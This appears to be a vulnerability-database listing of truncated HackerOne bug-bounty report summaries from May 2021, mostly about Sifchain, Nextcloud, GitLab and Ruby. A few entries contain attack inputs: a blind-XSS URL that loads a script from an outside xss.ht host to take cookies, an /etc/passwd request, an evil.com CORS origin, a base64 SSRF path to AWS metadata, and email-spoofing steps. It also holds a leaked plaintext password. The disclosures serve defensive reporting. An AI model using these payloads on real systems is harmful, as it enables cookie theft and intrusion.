
15267 matches found

Hacker One
added 2021/05/13 5:39 a.m., 11 views

U.S. Dept Of Defense: Default Admin Username and Password on █████ Server at █████████mil

Description: A ██████ Server is running at https://███mil you can access the login at https://████mil/█████████ the application is using the default "Administrator for the default organization" credentials POC Go to https://███mil/████████ and login with █████ ██████████ ████ ████ How to remediat...

AI score: 1.1
Exploits: 0

Hacker One
added 2021/05/13 12:20 a.m., 13 views

Sifchain: Clickjacking /framing on sensitive Subdomain

Vulnerability Name : Clickjacking /framing Vulnerability Description : Clickjacking is an interface-based attack in which user is tricked into clicking on actionable content on a hidden website by clicking on some other content in a decoy website . Vulnerable Url :...

AI score: 6.5
Exploits: 0

Hacker One
added 2021/05/12 11:42 p.m., 279 views

Sifchain: Wordpress Users Disclosure (/wp-json/wp/v2/users/) on sifchain.finance

Information: Using REST API, we can see all the WordPress users/author with some of their information. Step To Reproduce: You can get user info by entering below url in your browser: https://www.sifchain.finance/wp-json/wp/v2/users/ Results:...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/12 6:27 p.m., 51 views

Nextcloud: Virtual Data Room / Hide download on collabora is easy to bypass

So, let me start with saying I'm not sure if this is a security issue or if it is by design. The reason I'm reporting it here is since Nextcloud promotes this Virtual Data Room a lot...

CVSS: 4 | AI score: 4.3 | EPSS: 0.00226
Exploits: 0

Hacker One
added 2021/05/12 6:22 p.m., 173 views

Sifchain: No Valid SPF Records/don't have DMARC record

Hiii, There is any issue No valid SPF Records on https://sifchain.finance/ Description : There is an email spoofing vulnerability. Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing ...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/12 5:20 p.m., 17 views

Topcoder: Reflected XSS in https://www.topcoder.com/blog/category/community-stories/

Summary: Reflected XSS in https://www.topcoder.com/blog/category/community-stories/ Note: This is a reflected XSS vulnerability in a hidden input. With that vulnerability, an attacker could write his own code on the website. But with this vulnerability, an attacker also could lead a user, to go o...

AI score: 0.2
Exploits: 0

Hacker One
added 2021/05/12 5:7 p.m., 21 views

Sifchain: Wrong implementation of Telegram link on the main page for PC users

Summary: I found that there is a broken link for your telegram group. When a PC user clicks on telegram icon on your main page he is redirected to tg://resolve?domain=sifchain instead of https://t.me/sifchain due to some errors in configurationcoding. That idea is good for mobile view not desktop...

AI score: 6.6
Exploits: 0

Hacker One
added 2021/05/12 4:52 p.m., 409 views

Sifchain: CORS Misconfiguration

Summary: A cross-origin resource sharing CORS policy controls whether and how content running on other domains can perform two-way interaction with the domain that publishes the policy. The policy is fine-grained and can apply access controls per-request based on the URL and other features of th...

AI score: 6.7
Exploits: 0

Hacker One
added 2021/05/12 4:10 p.m., 15 views

GitLab: XSS by clicking Jira's link

Summary Since the value of /-/jiraconnect/users?returnto=xxx of xxx is used as a link as it is, it becomes XSS in some browsers. Steps to reproduce 1. Prepare a gitlab environment with no CSP configured e.g. localhost 2. Logged in with safari browser 3. Go to the...

AI score: 5.7
Exploits: 0

Hacker One
added 2021/05/12 1:14 p.m., 28 views

GlassWire: GlassWire 2.1.167 vulnerability - MSVR 56639

Arbitrary code execution vulnerability within the firewall software, GlassWire version 2.1.167 Impact After the program is installed, on first execution, it will attempt to load Wtsapi32.dll.dll from the user's PATH without doing any checks to see if the file is signed. Attached is a demo...

CVSS: 7.5 | AI score: 9.3 | EPSS: 0.00956
Exploits: 0

Hacker One
added 2021/05/12 11:9 a.m., 23 views

Nextcloud: Scoped apptokens can be changed by that very apptoken

I noticed that there is the possibility to limit apptokens to not be able to access the filesystem. 1. Create a new apptoken in https://server/settings/user/security 2. Click the .. of your new apptoken and make it not allowed to access the filesystem 3. Log out 4. Navigate to...

CVSS: 7.5 | AI score: 8.6 | EPSS: 0.03114
Exploits: 0

Hacker One
added 2021/05/12 8:15 a.m., 43 views

GitLab: Privilege escalation of "external user" (with maintainer privilege) to internal access through project token

Summary An "external user" a user account with the status external which is granted "Maintainer" role on any project on the GitLab instance where "project tokens" are allowed can elevate its privilege to "Internal". An external user with maintainer permissions could create a project token, which...

AI score: 6.5
Exploits: 0

Hacker One
added 2021/05/11 7:53 p.m., 10 views

Nextcloud: Clients do not verify server public key

So this is related to https://hackerone.com/reports/1189162 but also to your RFC Bear with me because there is going to be some hand waving here and there. Since not everything is implemented yet from your RFC. Right now what happens is:...

AI score: 0.1
Exploits: 0

Hacker One
added 2021/05/11 7:38 p.m., 28 views

GitLab: A deactivated user can access data through GraphQL

Summary A deactivated user should not be able to access information through the API. This rule is not enforced when making requests through the GraphQL endpoint. When reading through the changelog for 13.11.2 i noticed that the rule for a deactivated user allows for :login as it should but it is...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/11 2:23 p.m., 45 views

Nextcloud: public webdav endpoint not bruteforce protected

Again related to https://hackerone.com/reports/1173684 I am having some trouble finding the code. However if you do curl -u "RANDOM1:RANDOM2" -X PROPFIND https://server/public.php/webdav And then check your ocbruteforceattempts table. You'll see there is no entry registered. Impact Low just like ...

CVSS: 5 | AI score: 0.3 | EPSS: 0.00572
Exploits: 0

Hacker One
added 2021/05/11 2:0 p.m., 22 views

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure

ATTACK DETAILS Access-Control-Allow-Origin: https://sifchain.finance.evil.com Access-Control-Allow-Credentials: true Prefix origins are accepted www.example.com trusts example.com.evil.com Vulnerability Description CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/11 1:56 p.m., 29 views

Nextcloud: Add to your nextcloud endpoint is not properly protected

This is related to https://hackerone.com/reports/1173684 The endpoint you hit does have bruteforce protection https://github.com/nextcloud/server/blob/master/apps/federatedfilesharing/lib/Controller/MountPublicLinkController.phpL126 But this is only triggered by finding a share that is password...

CVSS: 5 | EPSS: 0.0034
Exploits: 0

Hacker One
added 2021/05/11 12:57 p.m., 31 views

Mail.ru: internal path disclosure via error message

Internal path in error message at activate.games.mail.ru...

AI score: 2.9
Exploits: 0

Hacker One
added 2021/05/10 11:50 p.m., 288 views

Sifchain: Email Spoofing on sifchain.finance

Summary: There is an Email Spoofing vulnerability on your domain sifchain.finance which allows an attacker to send an email with your domain name such as [email protected] and so on. Steps To Reproduce: Go to http://emkei.cz Fill "From Email" field to [email protected] or any other...

AI score: 6.7
Exploits: 0

Hacker One
added 2021/05/10 3:9 p.m., 50 views

Sifchain: CSRF in newsletter form

Hi, i can perform csrf attack on victim on newsletter to receive updates because you dont have csrf protection "csrf token" in request Request: POST / HTTP/2 Host: sifchain.finance User-Agent: Mozilla/5.0 Windows NT 10.0; Win64; x64; rv:88.0 Gecko/20100101 Firefox/88.0 Accept:...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/10 10:7 a.m., 14 views

Vanilla: BlIND XSS on https://open.vanillaforums.com

Hello sir My name is Mohit Kumar and I'm a security researcher. I found a bug in your website known as Blind xss just open this link -- https://open.vanillaforums.com/search?Search=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fhackerookie.xss.ht%3E%3C%2Fscript%3E --- I will receive your cookies and ip too...

AI score: 0.9
Exploits: 0

Hacker One
added 2021/05/09 12:53 p.m., 11 views

Ruby: XMLRPC does not limit deserializable classes.

Vulnerability description not provided...

AI score: 7.1
Exploits: 0

Hacker One
added 2021/05/09 9:49 a.m., 71 views

Evernote: Full read SSRF in www.evernote.com that can leak aws metadata and local file inclusion

Summary: The following endpoint was found to be vulnerable to SSRF : https://www.evernote.com/ro/aHR0cDovLzE2OS4yNTQuMTY5LjI1NC8jdGVzdC5qcw==/-1430533899.js The endpoint take a path in url and retrieve its content. it is supposed to be use on path but it can be used on URL to get access to intern...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/09 9:45 a.m., 117 views

Sifchain: Cross Origin Resource Sharing Misconfiguration | Lead to sensitive information.

hii team, i found a cors bug in your https://sifchain.finance/ website . Steps To Reproduce: 1. goto https://sifchain.finance/ website and enter email and click signup. 2. intercept via burp ,you will get a request . send to repeater. 3.change the request as POST /==wp-json== HTTP/2 Host:...

AI score: 6.6
Exploits: 0

Hacker One
added 2021/05/09 4:50 a.m., 77 views

Sifchain: Social media links not working

Summary: Hey team when i research i found business Logic issue and i will explain to you Steps To Reproduce: POC:- 1. Goto https://sifchain.finance/ 2.Try to add anything after https://sifchain.finance/ 3. Now you will show 404 page not found. 4. Look below in the page you will show links of soci...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/08 7:53 p.m., 20 views

Nextcloud: End to end encryption folder locking is not properly protected

I do not see the endtoendencryption app listed here. But since you advertise it big on your website and in communication. And the clients that also support it are covered I assume this is part of the program as well. 1. userA has end to end encryption setup 2. userB wants to annoy userA 3. userB...

CVSS: 4 | EPSS: 0.00185
Exploits: 1

Hacker One
added 2021/05/08 7:36 p.m., 24 views

Nextcloud: Android app does not clear end to end encryption keys

userA on serverA sets up end to end encryption on their android device 2. userA has some end to end encrypted data 3. userA removes their account on serverA from their android device for whatever reason 4. attacker evil admin obtains the device of userA 5. attacker evil admin logs in on the...

CVSS: 2.1 | AI score: 3.2 | EPSS: 0.00143
Exploits: 1

Hacker One
added 2021/05/08 7:22 p.m., 20 views

Nextcloud: End to end encryption public key is not properly verified on Desktop and Android

Since last time when I reported something on multiple platforms you seems to prefer handling it in 1 spot. I now just do one. Let me know if You want me to fill separate for android as well. This issue does not seem to happen on iOS as there a test string is encrypted and decrypted, in short...

AI score: 6.7
Exploits: 0

Hacker One
added 2021/05/08 12:50 p.m., 122 views

Sifchain: Information disclosure on Sifchain

Summary: Hello Team, I have found user/admin usernames disclosed. Using REST API, we can see all the WordPress users/authors with some of their information. such as id, name, login name, etc. and employees of Sifchain without authentication on https://sifchain.finance/ Steps To Reproduce: You can...

AI score: 6.5
Exploits: 0

Hacker One
added 2021/05/08 12:9 p.m., 117 views

Sifchain: Found key_adress and key_password in GitHub history

Summary: I found in your GitHub history keyadress and keypasswords Steps To Reproduce: 1. Open url https://github.com/Sifchain/sifnode/commit/f21dcf05c7953693b82bba119bba5ca48982b6d0diff-3b3ced8ca40f67dd52fd8031d9c2b5147c249a8c66b3aa066e355c0ee12fa14c 2. search for "keypassword" and you will find...

AI score: 6.7
Exploits: 0

Hacker One
added 2021/05/08 10:25 a.m., 17 views

Sifchain: Sifchain token leak

Hi Tim sifchain token leak 1=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-devnet.json 2=https://github.com/Sifchain/sifnode/blob/955a2450bca2b587d01d7fc0d8feacdf57fbb996/ui/core/src/tokenwhitelist.sifchain-testnet.json...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/08 12:31 a.m., 23 views

Sifchain: No Valid SPF Records at sifchain.finance

Hello, There is any issue No valid SPF Records Description : There is an email spoofing vulnerability. Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source. Email spoofing is a tactic used in phishing...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 10:5 p.m., 17 views

Sifchain: CORS Misconfiguration Leads to Sensitive Exposure on Sifchain main domain

Summary: Hello, I know that isn't in the Scope But this The Only Way I can Report With And It Belongs to the Main Domain. ==At first please see all those references given below:== References: https://hackerone.com/reports/768151 https://hackerone.com/reports/1167869...

AI score: 7
Exploits: 0

Hacker One
added 2021/05/07 9:22 p.m., 22 views

Sifchain: Username disclosure at Main Domain

Hello, PoC Link https://sifchain.finance//wp-json/wp/v2/users/ thanks. Impact Malicious counterpart could collect the usernames disclosed and the admin user and be focused throughout BF attack as the usernames are now known, making it less harder to penetrate the data.gov systems...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 9:7 p.m., 12 views

Sifchain: Design Issues at Main Domain

Hello i found design issue at sifchain.finance When we go to this website https://sifchain.finance/hello%20sifchain We get 404 so its normal but if you look at the bottom side of web page you can see the redirects will be broken. F1293150 Impact Content Spoofing...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/07 8:48 p.m., 198 views

Sifchain: Vulnerable javascript dependency at Main domain

Hello, Issue detail, Burp observed 1 outdated JavaScript libraries with 4 known vulnerabilities. Burp detected bootstrap version 4.0.0, which has the following vulnerabilities: CVE-2019-8331: XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2018-14041: XSS in...

CVSS: 4.3 | AI score: 6.2 | EPSS: 0.07723
Exploits: 4

Hacker One
added 2021/05/07 8:41 p.m., 116 views

Sifchain: Vulnerable for clickjacking attack

Summary: Hii Team, I know that I have reported to you outside of Scope. The report is related to the mentioned company and the vulnerability can endanger your business so I report this vulnerability to you. Clickjacking User Interface redress attack, UI redress attack, UI redressing is a maliciou...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 8:30 p.m., 20 views

Sifchain: Linux Desktop application "sifnoded" executable does not use Pie / no ASLR

Hello Sifchain, sifnoded binary from the Linux application is no position independent executable PoC; $file sifnoded Output will be like ; ███████ Position independent executables are required for full ASLR support on Linux. Non-pie-binaries are loaded to a fixed location, thus allowing ROP...

AI score: 8.4
Exploits: 0

Hacker One
added 2021/05/07 8:20 p.m., 85 views

Sifchain: Wrong Url in Main Page

Hello, There is no linkedin account belonging to the url you added to your homepage and this link can be easily captured by someone else. Misunderstandings may occur. F1293094 https://www.linkedin.com/company/kns-group/about/ Impact Broken Link Hijack...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 7:37 p.m., 24 views

Sifchain: CORS (Cross-Origin Resource Sharing) origin validation failure -Any website can issue requests made with user credentials and read the responses to th

Welcome! ==In this report I want to describe a high-level bug that can seriously put a user account at risk.== CORS Cross-Origin Resource Sharing defines a mechanism to enable client-side cross-origin requests. This application is using CORS in an insecure way. The web application fails to proper...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 7:1 p.m., 116 views

Sifchain: A password in plain text in conf file

I found a password in plain text in \sifnode-develop\ui\e2e\config.js in the source code. password: "coolguy21" Impact I don't know actually how does this affects but passwords in plaintexts are always dangerous...

AI score: 7
Exploits: 0

Hacker One
added 2021/05/07 5:14 p.m., 61 views

Internet Bug Bounty: "urllib" will result to deny of service

If a client requests an http/https/ftp service which is controlled by an attacker, the attacker can make this client hang forever, even if the client has set the "timeout" argument. Maybe this client will also consume more and more memory. I have not tested this conclusion. client.py import urllib.request req =...

CVSS: 7.1 | AI score: 7.8 | EPSS: 0.00119
Exploits: 1

Hacker One
added 2021/05/07 2:35 p.m., 20 views

Revive Adserver: Reflected XSS on /admin/stats.php

Hi, Security Team! Linked to the reports: - https://hackerone.com/reports/1083376 - https://hackerone.com/reports/1097217 In the past reports, we have corrected Reflected XSS. But recently it turned out that with the parameter breakdown = affiliates, this vulnerability still works. Fixed when...

CVSS: 4.3 | AI score: 1.3 | EPSS: 0.00372
Exploits: 1

Hacker One
added 2021/05/07 2:31 p.m., 21 views

Sifchain: Dependency Confusion Vulnerability in Sifnode Due to Unclaimed npm Packages.

Summary: Hello, I've found a Dependency Confusion vulnerability in the sifnode project. The vulnerability allows me to claim previously unclaimed npm packages that are being used by the sifnode project, and serve malicious content in them which would allow me to gain remote code execution on anyo...

AI score: 8.2
Exploits: 0

Hacker One
added 2021/05/07 8:18 a.m., 854 views

Sifchain: CORS misconfiguration

Description: Affected website: https://sifchain.finance/wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml Step-by-step Reproduction : 1. Send this request: javascript GET /wp-json/oembed/1.0/embed?url=https://sifchain.finance/&format=xml HTTP/1.1 Host: sifchain.finance...

AI score: 6.9
Exploits: 0

Hacker One
added 2021/05/07 6:14 a.m., 79 views

Sifchain: Email spoofing

Email spoofing is possible To verify: visit :https://www.kitterman.com/spf/validate.html? and type your domain name to check SPF record you can see the results as: NO valid SPF record found POC: 1.visit http://emkei.cz// 2.fill the from email as [email protected] 3.to email as victim email...

AI score: 6.8
Exploits: 0

Hacker One
added 2021/05/07 4:58 a.m., 20 views

Ruby: RCE by parsing `.rdoc_options` in RDoc

The Ruby RDoc library was vulnerable to remote code execution due to improper parsing of the `.rdoc_options` configuration file. When the RDoc command was executed, the library attempted to load the YAML-formatted `.rdoc_options` file, which allowed for the instantiation of arbitrary classes and the...

CVSS: 4.5 | AI score: 8 | EPSS: 0.02433
Exploits: 0

Hacker One
added 2021/05/07 1:45 a.m., 13 views

Ruby: XSS in HTML generated by RDoc

Vulnerability description not provided...

AI score: 7.1
Exploits: 0

Hacker One
added 2021/05/06 7:48 p.m., 274 views

Sifchain: wrong url in hackerone > goes to wix.com > unconnected

Summary: Hi there, this is a very small issue out of scope. Your current domain name in your hackerone program is wrong: http://sifchain.finance and moves to wix.com Steps To Reproduce: 1. Login as a researcher 2. Open the program from sifchain: https://hackerone.com/sifchain?type=team 3. click o...

AI score: 6.6
Exploits: 0

Hacker One
added 2021/05/06 7:23 p.m., 66 views

Reddit: critical file found etc/passwd on www.reddit.com

1. Go to this link https://www.reddit.com/etc%2fpasswd 2. You'll find all the etc/passwd files; this data should be protected. 3. These passwd can be used for many illegal purposes and can damage the company. PoC attached: HTTP/2 200 OK Content-Type: text/plain; charset=UTF-8 X-Ua-Compatible: IE=edge...

AI score: 7.2
Exploits: 0

Total number of security vulnerabilities: 15267